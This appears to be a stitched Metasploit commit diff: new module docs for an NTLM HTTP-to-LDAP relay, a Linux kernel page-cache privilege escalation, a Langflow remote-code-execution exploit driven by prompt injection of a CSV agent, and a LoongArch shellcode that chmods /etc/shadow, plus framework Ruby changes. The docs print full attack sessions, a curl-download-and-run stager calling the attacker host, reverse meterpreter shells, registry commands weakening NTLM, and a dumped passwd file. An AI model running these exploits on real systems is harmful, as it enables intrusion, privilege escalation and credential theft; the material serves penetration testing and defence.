daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
syslog:x:102:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
tss:x:105:105:TPM software stack,,,:/var/lib/tpm:/bin/false
systemd-oom:x:990:990:systemd Userspace OOM Killer:/:/usr/sbin/nologin
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
whoopsie:x:107:109::/nonexistent:/bin/false
dnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin
avahi:x:108:111:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
tcpdump:x:109:112::/nonexistent:/usr/sbin/nologin
sssd:x:110:113:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
cups-pk-helper:x:112:114:user for cups-pk-helper service,,,:/nonexistent:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
saned:x:113:116::/var/lib/saned:/usr/sbin/nologin
geoclue:x:114:117::/var/lib/geoclue:/usr/sbin/nologin
cups-browsed:x:115:114::/nonexistent:/usr/sbin/nologin
hplip:x:116:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-remote-desktop:x:988:988:GNOME Remote Desktop:/var/lib/gnome-remote-desktop:/usr/sbin/nologin
polkitd:x:987:987:User for polkitd:/:/usr/sbin/nologin
rtkit:x:117:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
colord:x:118:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
gnome-initial-setup:x:119:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:120:121:Gnome Display Manager:/var/lib/gdm3:/bin/false
nm-openvpn:x:121:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
bittman:x:1000:1000:bittman:/home/bittman:/bin/bash
postgres:x:122:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[*] Auxiliary module execution completed
```
@@ -0,0 +1,108 @@
## Vulnerable Application
### Description
This module sets up an HTTP server that attempts to execute an NTLM relay attack against an LDAP server on the
configured `RHOSTS`. The relay attack targets NTLMv1 authentication, as NTLMv2 cannot be relayed to LDAP due to the
Message Integrity Check (MIC). The module automatically removes the relevant flags to bypass signing.
This module supports relaying one HTTP authentication attempt to multiple LDAP servers. After attempting to relay to
one target, the relay server sends a 307 redirect to the client and, if the client is configured to follow redirects,
the client resends the NTLMSSP_NEGOTIATE request to the relay server. Multi-relay will not work if the client does not
follow redirects.
The module supports relaying NTLM authentication that has been wrapped in GSS-SPNEGO. HTTP authentication info is sent
in the WWW-Authenticate header. In the auth header, base64-encoded NTLM messages are denoted with the NTLM prefix,
while GSS-wrapped NTLM messages are denoted with the Negotiate prefix. Note that in some cases non-GSS-wrapped NTLM
auth can be prefixed with Negotiate.
If the relay attack is successful, an LDAP session is created on the target. This session can be used by other modules
that support LDAP sessions, such as:
- `admin/ldap/rbcd`
- `auxiliary/gather/ldap_query`
The module also supports capturing NTLMv1 and NTLMv2 hashes.
### Setup
For this relay attack to be successful, it is important to understand the difference between the Target Server (the
Domain Controller receiving the relayed authentication) and the Victim Client (the machine sending the initial HTTP
request) and how their respective configurations can impact the success of the attack.
The Domain Controller must be configured to accept LM or NTLM authentication. This means the `LmCompatibilityLevel`
registry key on the DC must be set to 4 or lower. If it is set to `5` ("Send NTLMv2 response only. Refuse
LM and NTLM"), the DC will reject the relayed authentication and the module will fail.
You can verify or modify the Domain Controller's level using the following commands:
```cmd
# To check the current level:
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel
# To set the level to 4 (or lower):
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel /t REG_DWORD /d 0x4 /f
```
The client being coerced must be willing to send the vulnerable NTLM responses.
- Non-Windows Clients: Custom tools or Linux-based HTTP clients are unaffected by Windows registry keys and can easily
be relayed to a vulnerable DC.
- Windows Clients: If you are coercing a native Windows HTTP client (like `Invoke-WebRequest` or a browser), the victim
machine's `LmCompatibilityLevel` dictates what it is allowed to send. To successfully relay a Windows client, its local
registry key typically needs to be set to `2` or lower. If the Windows client is operating at level `3` or higher, it
restricts itself to sending only NTLMv2 responses, which will cause the relay to fail even if the target DC is vulnerable.
## Verification Steps
1. Start msfconsole
2. Do: `use auxiliary/server/relay/http_to_ldap`
3. Set the `RHOSTS` options
4. Run the module
5. Send an authentication attempt to the relay server
6. `Invoke-WebRequest -Uri http://192.0.2.1/test -UseDefaultCredentials`
7. Check the output for successful relays and captured hashes
## Scenarios
### Relaying to multiple targets
```
msf auxiliary(server/relay/http_to_ldap) > set rhosts 172.16.199.200 172.16.199.201
rhosts => 172.16.199.200 172.16.199.201
msf auxiliary(server/relay/http_to_ldap) > run
[*] Auxiliary module running as background job 2.
[*] Relay Server started on 0.0.0.0:80
[*] Server started.
msf auxiliary(server/relay/http_to_ldap) > [*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
[*] Attempting to relay to ldap://172.16.199.201:389
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[*] Received type2 from target ldap://172.16.199.201:389, attempting to relay back to client
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state awaiting_type3 from 172.16.199.130
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
[+] Relay succeeded
[*] Moving to next target (172.16.199.200). Issuing 307 Redirect to /ZdF7Ufkm0I
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state unauthenticated from 172.16.199.130
[*] Received Type 1 message from 172.16.199.130, attempting to relay...
[*] Attempting to relay to ldap://172.16.199.200:389
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[*] Received type2 from target ldap://172.16.199.200:389, attempting to relay back to client
[*] Received GET request from 172.16.199.130, setting client_id to 172.16.199.130
[*] Processing request in state awaiting_type3 from 172.16.199.130
[*] Received Type 3 message from 172.16.199.130, attempting to relay...
[*] Dropping MIC and removing flags: `Always Sign`, `Sign` and `Key Exchange`
[+] Identity: KERBEROS\Administrator - Successfully relayed NTLM authentication to LDAP!
[+] Relay succeeded
[*] Target list exhausted for 172.16.199.130. Closing connection.
msf auxiliary(server/relay/http_to_ldap) > sessions -i -1
[*] Starting interaction with 5...
LDAP (172.16.199.200) > getuid
[*] Server username: KERBEROS\Administrator
LDAP (172.16.199.200) >
```
@@ -0,0 +1,80 @@
## Vulnerable Application
CVE-2026-31431 is a logic flaw in the Linux kernel's authencesn AEAD template that, when reached via the
AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled
4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the
on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local
privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as /usr/bin/su.
The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and
affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.
## Verification Steps
1. Obtain a session on an affected Linux host
2. Set the PAYLOAD and related datastore options
3. Run the exploit
## Options
N/A
## Scenarios
### Ubuntu 24.04 x64
```
msf exploit(multi/ssh/sshexec) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.132:22 - Sending stager...
[*] Command Stager progress - 46.74% done (402/860 bytes)
[*] Sending stage (3090404 bytes) to 192.168.159.132
[*] Meterpreter session 24 opened (192.168.159.128:4444 -> 192.168.159.132:38262) at 2026-04-30 14:50:33 -0400
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (860/860 bytes)
meterpreter > getuid
Server username: smcintyre
meterpreter > sysinfo
Computer : ubuntu2404
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 24...
msf exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2026_31431_copy_fail
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/local/cve_2026_31431_copy_fail) > set SESSION -1
SESSION => -1
msf exploit(linux/local/cve_2026_31431_copy_fail) > set VERBOSE true
VERBOSE => true
msf exploit(linux/local/cve_2026_31431_copy_fail) > set LPORT 5555
LPORT => 5555
msf exploit(linux/local/cve_2026_31431_copy_fail) > exploit
[*] Command to run on remote host: curl -so ./JVvusljc http://192.168.159.128:8080/dau8JtEFWcUux21CRy4HUQ;chmod +x ./JVvusljc;./JVvusljc&
[*] Fetch handler listening on 192.168.159.128:8080
[*] HTTP server started
[*] Adding resource /dau8JtEFWcUux21CRy4HUQ
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using 'python3' on the remote target.
[+] The exploit socket has been created, encryption primitives are available.
[*] Triggering the vulnerability using Python...
[+] The target is vulnerable.
[*] Triggering the vulnerability using Python...
[*] Client 192.168.159.132 requested /dau8JtEFWcUux21CRy4HUQ
[*] Sending payload to 192.168.159.132 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.159.132
[*] Meterpreter session 25 opened (192.168.159.128:5555 -> 192.168.159.132:48976) at 2026-04-30 14:51:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : ubuntu2404
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
@@ -0,0 +1,186 @@
## Vulnerable Application
The CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`,
which automatically exposes LangChain's Python REPL tool (`python_repl_ast`).
As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection,
leading to full Remote Code Execution (RCE).
The vulnerability affects:
* Langflow < 1.8.0
This module was successfully tested on:
* Langflow 1.7.3 installed with Docker
### Installation
1. `git clone https://github.com/langflow-ai/langflow.git`
2. `git checkout 1.7.3`
3. `cd langflow/docker_example`
4. `Edit docker-compose.yml`
```
services:
langflow:
- image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
- pull_policy: always # set to 'always' when using 'latest' image
+ # image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
+ image: langflowai/langflow:1.7.3 # or another version tag on https://hub.docker.com/r/langflowai/langflow
+ # pull_policy: always # set to 'always' when using 'latest' image
ports:
- "7860:7860"
depends_on:
@@ -11,7 +12,7 @@ services:
# This variable defines where the logs, file storage, monitor data and secret keys are stored.
- LANGFLOW_CONFIG_DIR=/app/langflow
volumes:
- - langflow-data:/app/langflow
+ - langflow-data:/app
postgres:
image: postgres:16
```
5. `docker compose up`
6. `On an attacker machine`
```
curl -fsSL https://ollama.com/install.sh | sh
ollama run llama3.1
```
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_rce_cve_2026_27966`
4. Do: `run lhost=<lhost> rhost=<rhost> ollamaapiuri=<ollamaapiuri> apikey=<apikey> model=<model>`
5. You should get a meterpreter
## Options
### APIKEY (required)
Langflow API key to interact with Langflow.
### OLLAMAAPIURI (required)
Endpoint of the OLLAMA API controlled by an attacker.
### MODEL (required)
Valid ollama model name.
## Scenarios
### cmd/linux/http/x64/meterpreter_reverse_tcp
```
msf > use exploit/multi/http/langflow_rce_cve_2026_27966
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/langflow_rce_cve_2026_27966) > options
Module options (exploit/multi/http/langflow_rce_cve_2026_27966):
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY yes Langflow API key to interact with Langflow.
MODEL yes Valid ollama model name.
OLLAMAAPIURI yes Endpoint of the OLLAMA API controlled by an attacker.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h, sapni, socks4, socks5, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 7860 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
cepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,GET,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME yVhDYYwMmZm no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payl
oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
[*] Project: 367f399f-6f17-43a2-bea0-33183baae731
[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087
[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9
[*] Waiting...
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : d513d5e46402
OS : Debian 13.3 (Linux 6.8.0-56-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
### python/meterpreter/reverse_tcp
```
msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401
[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b
[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8
[*] Waiting...
[*] Sending stage (23404 bytes) to 192.168.56.16
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : d513d5e46402
OS : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
Architecture : x64
System Language : C
Meterpreter : python/linux
meterpreter >
```
@@ -0,0 +1,69 @@
## Vulnerable Application
This payload targets Linux systems running on the LoongArch64 architecture. It uses the
`fchmodat` syscall (syscall number 53) to change the permissions of a specified file, then
exits cleanly via the `exit` syscall (syscall number 93).
The payload is a 48-byte position-independent shellcode stub. It is suitable for use in
exploits targeting LoongArch64 Linux systems where arbitrary code execution has been achieved.
## Verification Steps
1. Generate the payload as an ELF executable:
```
./msfvenom -p linux/loongarch64/chmod FILE=/tmp/testfile MODE=0777 -f elf -o chmod.elf
chmod +x chmod.elf
```
2. Run it under QEMU user-mode emulation:
```
qemu-loongarch64 -strace ./chmod.elf
```
3. Confirm the `fchmodat` syscall was made and returned 0:
```
fchmodat(AT_FDCWD,"/tmp/testfile",0777,0) = 0
exit(0)
```
4. Verify the file permissions changed:
```
ls -la /tmp/testfile
```
## Options
### FILE
The full path of the file to chmod on the target system. Defaults to `/etc/shadow`.
### MODE
The desired file permissions in octal notation (e.g. `0777`, `0666`, `0644`). Defaults to `0666`.
Must not exceed `0xFFF` (octal `07777`).
## Scenarios
### LoongArch64 Linux — making /etc/shadow world-readable
This scenario demonstrates using the payload to make `/etc/shadow` readable after gaining
code execution on a LoongArch64 Linux target.
#### Version and OS: LoongArch64 Linux (tested with qemu-loongarch64)
Generate the payload:
```
msf6 > use payload/linux/loongarch64/chmod
msf6 payload(linux/loongarch64/chmod) > set FILE /etc/shadow
FILE => /etc/shadow
msf6 payload(linux/loongarch64/chmod) > set MODE 0644
MODE => 0644
msf6 payload(linux/loongarch64/chmod) > generate -f elf -o /tmp/chmod.elf
[*] Writing 168 bytes to /tmp/chmod.elf...
```
Run on target (or via QEMU for testing):
```
$ qemu-loongarch64 -strace /tmp/chmod.elf
fchmodat(AT_FDCWD,"/etc/shadow",0644,0) = 0
exit(0)
```
-6
View File
@@ -6,16 +6,10 @@
#
require 'active_support'
require 'bcrypt'
require 'json'
require 'msgpack'
require 'metasploit/credential'
require 'nokogiri'
# railties has not autorequire defined
# rkelly-remix is a fork of rkelly, so it's autorequire is 'rkelly' and not 'rkelly-remix'
require 'rkelly'
require 'robots'
require 'zip'
require 'msf'
#
# Project
+1 -1
View File
@@ -32,7 +32,7 @@ module Metasploit
end
end
VERSION = "6.4.128"
VERSION = "6.4.132"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash
+4
View File
@@ -175,9 +175,13 @@ protected
begin
begin
job_listener.start run_uuid
mod.check_code = nil if mod.respond_to?(:check_code=)
mod.last_vuln_attempt = nil if mod.respond_to?(:last_vuln_attempt=)
mod.setup
mod.framework.events.on_module_run(mod)
result = block.call(mod)
# Store the check result if the block returned a CheckCode
mod.check_code = result if result.is_a?(Msf::Exploit::CheckCode)
job_listener.completed(run_uuid, result, mod)
rescue ::Exception => e
job_listener.failed(run_uuid, e, mod)
+12
View File
@@ -181,6 +181,18 @@ class Auxiliary < Msf::Module
#
attr_accessor :fail_detail
#
# The result of the last check invocation (a Msf::Exploit::CheckCode), if any
#
attr_accessor :check_code
#
# The VulnAttempt object created during this run, or nil/false if none
# was recorded. Used to prevent duplicate attempts when report_failure
# is called later and to enrich the attempt with check code details.
#
attr_accessor :last_vuln_attempt
attr_accessor :queue
protected
@@ -17,12 +17,20 @@ module Auxiliary::MultipleTargetHosts
end
def check
return Exploit::CheckCode::Unsupported unless has_check?
nmod = replicant
begin
nmod.check_host(datastore['RHOST'])
rescue NoMethodError
Exploit::CheckCode::Unsupported
result = nmod.check_host(datastore['RHOST'])
# Propagate the last_vuln_attempt (which may be the actual VulnAttempt
# object) back from the replicant so that the ensure block in
# job_run_proc (which calls report_failure on the *original* instance)
# knows a vuln attempt was already created and can enrich it directly.
if nmod.respond_to?(:last_vuln_attempt) && nmod.last_vuln_attempt && respond_to?(:last_vuln_attempt=)
self.last_vuln_attempt = nmod.last_vuln_attempt
end
result
end
end
+22 -2
View File
@@ -314,11 +314,31 @@ module Auxiliary::Report
:fail_detail => 'vulnerability identified',
:fail_reason => 'Untried', # Mdm::VulnAttempt::Status::UNTRIED, avoiding direct dependency on Mdm, used elsewhere in this module
:module => mname,
:username => username || "unknown"
:username => username || self.owner || "unknown"
}
# Enrich attempt with check code details when available.
# Accept an explicit check_code in opts (useful when the module knows the
# result before the framework sets self.check_code), falling back to the
# module-level accessor.
check_code = opts[:check_code]
check_code = self.check_code if check_code.nil? && self.respond_to?(:check_code)
if check_code.is_a?(Msf::Exploit::CheckCode)
attempt_info[:check_code] = check_code.code
attempt_info[:check_detail] = check_code.reason || check_code.message
attempt_info[:fail_detail] = nil
mapped_reason = Msf::Module::Failure.fail_reason_from_check_code(check_code)
attempt_info[:fail_reason] = mapped_reason if mapped_reason
end
# TODO: figure out what opts are required and why the above logic doesn't match that of the db_manager method
framework.db.report_vuln_attempt(vuln, attempt_info)
attempt = framework.db.report_vuln_attempt(vuln, attempt_info)
# Store the attempt object so that report_failure (called later by the
# job wrapper) can enrich it directly without re-querying the DB.
if self.respond_to?(:last_vuln_attempt=)
self.last_vuln_attempt = attempt || true
end
vuln
end
+15
View File
@@ -15,6 +15,19 @@ include Msf::Auxiliary::MultipleTargetHosts
class AttemptFailed < Msf::Auxiliary::Failed
end
# Scanner modules handle per-host failure reporting through replicants
# inside their run_host/run_batch threads. Override the default
# report_failure so that the parent-level call from job_run_proc's
# ensure block does not create a duplicate or misattributed attempt
# after a scan. The check path (check_simple) still needs the
# default report_failure behaviour, so we only skip when the scanner's
# run method has executed.
def report_failure
return if @scanner_run_completed
super
end
#
# Initializes an instance of a recon auxiliary module
#
@@ -42,6 +55,7 @@ end
# The command handler when launched from the console
#
def run
@scanner_run_completed = false
@show_progress = datastore['ShowProgress']
@show_percent = datastore['ShowProgressPercent'].to_i
@@ -260,6 +274,7 @@ def run
print_status("Caught interrupt from the console...")
return
ensure
@scanner_run_completed = true
seppuko!()
end
end
+42 -8
View File
@@ -79,9 +79,25 @@ module Msf::DBManager::ExploitAttempt
vuln = nil
if rids.present?
# Try to find an existing vulnerability with the same service & references
# or, if svc is nil, with the same host & references
vuln = find_vuln_by_refs(rids, host, svc, false)
# Only perform vuln lookup when no check_code is present (normal
# exploit flow) or the check result positively indicates vulnerability.
# Safe, Unknown, and Detected results should not associate this attempt
# with an existing vuln. Only key off check_code — fail_reason alone
# is too broad (e.g. Failure::Unknown covers real exploit failures too).
vuln_check_codes = [Msf::Exploit::CheckCode::Appears.code, Msf::Exploit::CheckCode::Vulnerable.code]
if opts[:check_code].nil? || vuln_check_codes.include?(opts[:check_code])
# Try to find an existing vulnerability with the same service & references
# or, if svc is nil, with the same host & references
vuln = find_vuln_by_refs(rids, host, svc, false)
# Fall back to a host-only lookup when the service-scoped query found
# nothing. Only match vulns with no associated service to avoid
# misattributing attempts to a vuln on a different service.
if svc && vuln.nil?
fallback_vuln = find_vuln_by_refs(rids, host, nil, false)
vuln = fallback_vuln if fallback_vuln && fallback_vuln.service_id.nil?
end
end
end
opts[:service] = svc
@@ -158,8 +174,20 @@ module Msf::DBManager::ExploitAttempt
# Create a references map from the module list
ref_objs = ::Mdm::Ref.where(name: ref_names)
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc, false)
# Only perform vuln lookup when no check_code is present (normal
# exploit flow) or the check result positively indicates vulnerability.
# Safe, Unknown, and Detected results should not associate this attempt
# with an existing vuln. Only key off check_code — fail_reason alone
# is too broad (e.g. Failure::Unknown covers real exploit failures too).
vuln_check_codes = [Msf::Exploit::CheckCode::Appears.code, Msf::Exploit::CheckCode::Vulnerable.code]
if opts[:check_code].nil? || vuln_check_codes.include?(opts[:check_code])
# Try find a matching vulnerability
vuln = find_vuln_by_refs(ref_objs, host, svc, false)
if svc && vuln.nil?
fallback_vuln = find_vuln_by_refs(ref_objs, host, nil, false)
vuln = fallback_vuln if fallback_vuln && fallback_vuln.service_id.nil?
end
end
end
attempt_info = {
@@ -170,12 +198,17 @@ module Msf::DBManager::ExploitAttempt
:module => mname,
:username => username || "unknown",
}
attempt_info[:check_code] = opts[:check_code] if opts[:check_code]
attempt_info[:check_detail] = opts[:check_detail] if opts[:check_detail]
attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
# We have match, lets create a vuln_attempt record
if vuln
# We have match, lets create a vuln_attempt record.
# Skip if the caller already recorded a vuln attempt for this run
# (e.g. Auxiliary::Report#report_vuln sets skip_vuln_attempt via
# the last_vuln_attempt flag on the module).
if vuln && !opts[:skip_vuln_attempt]
attempt_info[:vuln_id] = vuln.id
vuln.vuln_attempts.create(attempt_info)
@@ -200,7 +233,8 @@ module Msf::DBManager::ExploitAttempt
attempt_info[:proto] = prot || Msf::DBManager::DEFAULT_SERVICE_PROTO
end
host.exploit_attempts.create(attempt_info)
# check_code and check_detail are valid for VulnAttempt but not ExploitAttempt
host.exploit_attempts.create(attempt_info.except(:check_code, :check_detail))
}
end
-1
View File
@@ -1,4 +1,3 @@
require 'bcrypt'
require 'securerandom'
module Msf::DBManager::User
-2
View File
@@ -2,8 +2,6 @@
module Msf
module Exe
require 'metasm'
class SegmentAppender < SegmentInjector
def payload_stub(prefix)
-2
View File
@@ -2,8 +2,6 @@
module Msf
module Exe
require 'metasm'
class SegmentInjector
attr_accessor :payload
+7
View File
@@ -1493,6 +1493,13 @@ class Exploit < Msf::Module
#
attr_accessor :fail_detail
#
# The VulnAttempt object created during this run, or nil/false if none
# was recorded. Used to prevent duplicate attempts when report_failure
# is called later and to enrich the attempt with check code details.
#
attr_accessor :last_vuln_attempt
#
# The list of targets.
#
+2 -1
View File
@@ -51,7 +51,8 @@ module Exploit::Remote::AutoCheck
name: fullname,
username: respond_to?(:owner) ? owner : nil,
refs: references,
info: description.strip
info: description.strip,
check_code: check_code
}
if respond_to?(:session) && session.respond_to?(:session_host)
@@ -1,7 +1,7 @@
# 3rd party gems
require 'http/cookie_jar/hash_store'
require 'http/cookie_jar'
require 'http/cookie'
require 'http/cookie_jar'
require 'http/cookie_jar/hash_store'
# This class is a collection of Http Cookies with some built in convenience methods.
# Acts as a wrapper for the +::HTTP::CookieJar+ (https://www.rubydoc.info/gems/http-cookie/1.0.2/HTTP/CookieJar) class.
@@ -0,0 +1,109 @@
# -*- coding: binary -*-
# frozen_string_literal: true

module Msf
  module Exploit::Remote::HttpServer
    # Mixin providing the HTTP-server side of an NTLM relay attack.
    #
    # It mounts a single resource at '/' and hands every incoming request to a
    # per-client state machine (a ServerClient instance) that performs the
    # NTLM Type1/Type2/Type3 relay against the targets supplied via RHOSTS.
    # Client state machines are kept in @relay_clients, keyed by the peer's
    # "host:port" authority string, and guarded by @relay_clients_mutex since
    # the underlying HTTP service dispatches requests from multiple threads.
    module Relay
      # relay_targets is presumably provided by MultipleTargetHosts — TODO confirm
      include ::Msf::Auxiliary::MultipleTargetHosts
      include ::Msf::Exploit::Remote::Relay::NTLM::HashCapture
      include Msf::Exploit::Remote::HttpServer

      # Object used for user-facing output; set in start_service (defaults to self).
      attr_reader :logger

      # Registers the relay-specific options and initializes the per-client
      # session table and its mutex.
      def initialize(info = {})
        super
        register_options(
          [
            OptPort.new('SRVPORT', [true, 'The local port to listen on.', 80]),
            OptAddress.new('SRVHOST', [ true, 'The local host to listen on.', '0.0.0.0' ]),
            OptAddressRange.new('RHOSTS', [true, 'Target address range or CIDR identifier to relay to'], aliases: ['LDAPHOST', 'RELAY_TARGETS']),
            OptInt.new('RELAY_TIMEOUT', [true, 'Seconds that the relay socket will wait for a response after the client has initiated communication.', 25])
          ], self.class
        )
        @relay_clients = {}               # client_id ("host:port") => ServerClient
        @relay_clients_mutex = Mutex.new  # guards @relay_clients across service threads
      end

      # Starts the HTTP service and routes every request under '/' to
      # on_relay_request. An alternate logger may be injected via opts['Logger'].
      def start_service(opts = {})
        @logger = opts['Logger'] || self
        super
        # Keep a handle on the service so cleanup can stop exactly this instance.
        @http_relay_service = self.service
        relay_path = '/'
        add_resource(
          'Proc' => Proc.new { |cli, req| on_relay_request(cli, req) },
          'Path' => relay_path
        )
      end

      # Entry point for every HTTP request hitting the relay server. Looks up
      # (or creates) the ServerClient state machine for this connection and
      # forwards the request to it.
      def on_relay_request(cli, req)
